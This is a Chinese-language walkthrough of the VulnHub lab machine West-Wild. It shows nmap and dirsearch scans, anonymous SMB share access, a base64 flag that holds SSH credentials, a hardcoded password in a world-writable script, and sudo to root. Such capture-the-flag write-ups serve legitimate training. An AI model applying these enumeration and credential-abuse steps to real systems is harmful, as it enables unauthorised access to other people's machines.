Vulnhub——West-Wild
信息收集
存活主机扫描
ip:192.168.197.168
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.197.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-01 09:18 CST
Nmap scan report for bogon (192.168.197.1)
Host is up (0.00021s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for bogon (192.168.197.2)
Host is up (0.00022s latency).
MAC Address: 00:50:56:F2:C0:58 (VMware)
Nmap scan report for bogon (192.168.197.168)
Host is up (0.00038s latency).
MAC Address: 00:0C:29:B5:E6:8D (VMware)
Nmap scan report for bogon (192.168.197.254)
Host is up (0.00023s latency).
MAC Address: 00:50:56:F1:71:34 (VMware)
Nmap scan report for bogon (192.168.197.128)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.95 seconds
端口探测
22、80、139、445
┌──(root㉿kali)-[~]
└─# nmap -A -p- 192.168.197.168
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-01 09:18 CST
Nmap scan report for bogon (192.168.197.168)
Host is up (0.00049s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 6f:ee:95:91:9c:62:b2:14:cd:63:0a:3e:f8:10:9e:da (DSA)
| 2048 10:45:94:fe:a7:2f:02:8a:9b:21:1a:31:c5:03:30:48 (RSA)
| 256 97:94:17:86:18:e2:8e:7a:73:8e:41:20:76:ba:51:73 (ECDSA)
|_ 256 23:81:c7:76:bb:37:78:ee:3b:73:e2:55:ad:81:32:72 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:0C:29:B5:E6:8D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: WESTWILD; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h00m00s, deviation: 1h43m55s, median: 0s
| smb2-time:
| date: 2023-08-01T01:18:39
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: WESTWILD, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: westwild
| NetBIOS computer name: WESTWILD\x00
| Domain name: \x00
| FQDN: westwild
|_ System time: 2023-08-01T04:18:39+03:00
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms bogon (192.168.197.168)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.82 seconds
渗透过程
查看80端口
没有发现有用信息,进行目录探测,也没有发现有用信息
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.197.168
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.197.168/_23-08-01_09-22-43.txt
Error Log: /root/.dirsearch/logs/errors-23-08-01_09-22-43.log
Target: http://192.168.197.168/
[09:22:43] Starting:
[09:22:45] 403 - 293B - /.ht_wsr.txt
[09:22:45] 403 - 296B - /.htaccess.orig
[09:22:45] 403 - 294B - /.htaccessOLD
[09:22:45] 403 - 296B - /.htaccess.bak1
[09:22:45] 403 - 296B - /.htaccess_orig
[09:22:45] 403 - 298B - /.htaccess.sample
[09:22:45] 403 - 297B - /.htaccess_extra
[09:22:45] 403 - 296B - /.htaccess.save
[09:22:45] 403 - 295B - /.htaccessOLD2
[09:22:45] 403 - 294B - /.htaccess_sc
[09:22:45] 403 - 294B - /.htaccessBAK
[09:22:45] 403 - 287B - /.html
[09:22:45] 403 - 286B - /.htm
[09:22:45] 403 - 296B - /.htpasswd_test
[09:22:45] 403 - 292B - /.htpasswds
[09:22:45] 403 - 293B - /.httr-oauth
[09:22:46] 403 - 287B - /.php3
[09:22:46] 403 - 286B - /.php
[09:23:07] 200 - 263B - /index.html
[09:23:18] 403 - 296B - /server-status/
[09:23:18] 403 - 295B - /server-status
Task Completed
445(smb)端口,可能存在共享目录
利用smbmap查看,发现存在共享目录wave
┌──(root㉿kali)-[~]
└─# smbmap -H 192.168.197.168
[+] Guest session IP: 192.168.197.168:445 Name: bogon
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
wave READ ONLY WaveDoor
IPC$ NO ACCESS IPC Service (WestWild server (Samba, Ubuntu))
进行smbclient连接
┌──(root㉿kali)-[~]
└─# smbclient //192.168.197.168/wave
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 30 13:18:56 2019
.. D 0 Fri Aug 2 07:02:20 2019
FLAG1.txt N 93 Tue Jul 30 10:31:05 2019
message_from_aveng.txt N 115 Tue Jul 30 13:21:48 2019
1781464 blocks of size 1024. 282780 blocks available
发现存在两个.txt文件
将它们存到本地
smb: \> get FLAG1.txt
getting file \FLAG1.txt of size 93 as FLAG1.txt (30.3 KiloBytes/sec) (average 30.3 KiloBytes/sec)
smb: \> get message_from_aveng.txt
getting file \message_from_aveng.txt of size 115 as message_from_aveng.txt (56.1 KiloBytes/sec) (average 40.6 KiloBytes/sec)
smb: \> quit
获取第一个flag
进行查看,获取到第一个flag,像是base64编码,解码试试
┌──(root㉿kali)-[~]
└─# cat FLAG1.txt
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K
┌──(root㉿kali)-[~]
└─# cat message_from_aveng.txt
Dear Wave ,
Am Sorry but i was lost my password ,
and i believe that you can reset it for me .
Thank You
Aveng
亲爱的波浪,
对不起,我丢失了密码,
我相信你可以为我重置它.
谢谢
阿文格
得到了一个flag和一组账户密码
进行ssh连接,成功
┌──(root㉿kali)-[~]
└─# ssh wavex@192.168.197.168
wavex@192.168.197.168's password:
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Tue Aug 1 12:16:18 +03 2023
System load: 0.0 Memory usage: 4% Processes: 161
Usage of /: 77.9% of 1.70GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
https://landscape.canonical.com/
Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Aug 2 02:00:40 2019
wavex@WestWild:~$ id
uid=1001(wavex) gid=1001(wavex) groups=1001(wavex)
查看用户执行权限
发现密码不正确
wavex@WestWild:~$ sudo -l
[sudo] password for wavex:
Sorry, user wavex may not run sudo on WestWild.
查看计划任务
发现也无可用信息
wavex@WestWild:/home/aveng$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
查看passwd文件
还存在一个aveng用户
wavex@WestWild:/home/aveng$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
aveng:x:1000:1000:aveng,,,:/home/aveng:/bin/bash
wavex:x:1001:1001:XxWavexX,,,:/home/wavex:/bin/bash
查看哪些文件具有写的权限
wavex@WestWild:/home/aveng$ find / -writable -type d 2>/dev/null
/sys/fs/cgroup/systemd/user/1001.user/1.session
/usr/share/av/westsidesecret
/home/wavex
/home/wavex/.cache
/home/wavex/wave
/var/lib/php5
/var/spool/samba
/var/crash
/var/tmp
/proc/1750/task/1750/fd
/proc/1750/fd
/proc/1750/map_files
/run/user/1001
/run/shm
/run/lock
/tmp
查看/usr/share/av/westsidesecret目录
发现一组账号密码
user:aveng password:kaizen+80
wavex@WestWild:/home/aveng$ cd /usr/share/av/westsidesecret/
wavex@WestWild:/usr/share/av/westsidesecret$ ls -al
total 12
drwxrwxrwx 2 root root 4096 Jul 30 2019 .
drwxr-xr-x 3 root root 4096 Jul 30 2019 ..
-rwxrwxrwx 1 wavex wavex 101 Jul 30 2019 ififoregt.sh
wavex@WestWild:/usr/share/av/westsidesecret$ cat ififoregt.sh
#!/bin/bash
figlet "if i foregt so this my way"
echo "user:aveng"
echo "password:kaizen+80"
切换到aveng用户
wavex@WestWild:/usr/share/av/westsidesecret$ su aveng
Password:
aveng@WestWild:/usr/share/av/westsidesecret$ id
uid=1000(aveng) gid=1000(aveng) groups=1000(aveng),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(sambashare),114(lpadmin)
提权
查看用户可执行权限
[sudo] password for aveng:
Matching Defaults entries for aveng on WestWild:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aveng may run the following commands on WestWild:
(ALL : ALL) ALL
获取root权限
可执行所有权限,直接提权,得到root权限,获取到第二个flag
aveng@WestWild:/usr/share/av/westsidesecret$ sudo /bin/bash
root@WestWild:/usr/share/av/westsidesecret# cd /root
root@WestWild:/root# ls
FLAG2.txt
root@WestWild:/root# cat FLAG2.txt
Flag2{Weeeeeeeeeeeellco0o0om_T0_WestWild}
Great! take a screenshot and Share it with me in twitter @HashimAlshareff